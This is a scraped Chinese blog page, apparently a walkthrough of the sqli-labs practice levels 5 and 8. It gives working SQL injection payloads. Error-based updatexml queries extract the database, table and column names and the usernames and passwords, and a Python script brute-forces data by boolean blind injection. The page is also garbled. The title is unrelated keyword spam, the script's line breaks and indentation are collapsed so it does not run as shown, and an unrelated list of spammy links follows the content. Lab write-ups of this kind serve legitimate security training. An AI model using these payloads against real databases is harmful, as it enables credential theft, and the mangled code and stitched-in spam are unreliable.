当前位置: 首页 > news >正文

文献综述 php网站开发自适应网站开发seo

news 2025/9/16 3:00:46
文献综述 php网站开发,自适应网站开发seo,厦门企业制作网站,进下加强新闻宣传网站建设sqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型,闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入 我们先爆库名 http://127.0.0.1/sqli-labs-master/L…

sqllabs5:(报错注入)

?id=1  回显You are in...........
?id=2-1  回显You are in...........
?id=1'  回显'  '1'' LIMIT 0,1  '判断是字符型,'闭合。

?id=1'order by 3--+    //页面显示正常

我们试了4行得出是报错注入

我们先爆库名

http://127.0.0.1/sqli-labs-master/Less-5/?id='and updatexml(1,concat(0x7e,(select database()),0x7e),3)--+

拿下库名:security

爆表名

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)%20--+

拿下表名

然后爆字段:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+

爆数据:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) --+

数据不完整,因为updatexml()函数的报错内容不超过32个字符,所以我们还需要对数据进行处理

使用substring()函数对结果字符进行处理

?id=-1' and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) --+

之后我们就可以不断改变位置,这样我们就可以得到所有数据,后续的操作不再演示

sqllabs8:布尔盲注

报错注入被注释掉了

联合查询只出现you are in ..........

所以这里我们能看见一真一假(页面特征)

不加'时为真

http://127.0.0.1/sqli-labs-master/Less-8/?id=1

加入'时为假

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'

我们可以用布尔盲注

我们数据库名:

security,s的ascii码是115,我们可以一个一个试一试

http://127.0.0.1/sqli-labs-master/Less-8//?id=1' and ascii(substring((select database()),1,1))=115--+

利用二分法和ASCII码进行渗透:

根据此现象我们写一个python脚本快速进行注入

import time
import requestsurl = 'http://127.0.0.1/sqli-labs-master/Less-8/index.php'def inject_database(url):name = ''for i in range(1, 50):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)res = {"id": payload}# start_time = time.time()r = requests.get(url, params=res)# end_time = time.time()if 'You are in...........' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)

爆库名;

爆表名:

payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)

爆列名:

payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)

爆数据:

payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)

http://www.yayakq.cn/news/80151/

相关文章:

  • 深圳龙华建设局官方网站小程序制作模板免费
  • 印刷 网站模板郑州企业微网站建设
  • 哪家公司做门户网站网页微信版本
  • win2008网站404百度关键词优化曝光行者seo
  • 网站目录管理模板下载制作网站用c 做前台
  • 乐山市建设银行网站胶州哪里有做网站的
  • 北京昌盛宏业网站建设怎么在南京人社网站做失业登记
  • 如何快速增加网站收录163免费邮箱入口
  • 做网站或者app购买网站空间自己怎样建立网站
  • 做网站的公司简介北京科技网站建设
  • 网站备案下来以后怎么做网页基于 的企业网站建设
  • 巴中市做网站网页设计培训训
  • 普陀网站建设比较实惠wordpress爱找主题
  • 想学做蛋糕用哪一个网站个人网页可以做什么内容
  • 温州网站推广有哪些方法网站用什么字体做正文
  • 淘宝客 网站 备案手机网站开发者工具
  • WordPress外贸企业站主题个人网站做淘宝客容易封吗
  • wordpress站内信群发可以做免费推广的网站吗
  • 南宁外贸网站建设功能公司seo网站搭建是什么
  • 网站的外链情况部门网站建设情况汇报
  • 网站开发用技术wordpress企业原创主题
  • 免费网站建设哪个最好学动漫设计有前途吗
  • 北京好的网站开发做企业网站用什么框架
  • 深圳网站官网建设方案昆明双鼎网站制作
  • 溧阳建设局网站网站域名改版
  • 东莞网站建设 石佳专业的河南网站建设
  • 沧州建设厅网站小程序定制外包
  • 秦皇岛网络编辑网站网站图标怎么做
  • 系统官网网站模板下载安装万能浏览器有哪些
  • 自己有服务器如何建设微网站软件app开发公司电话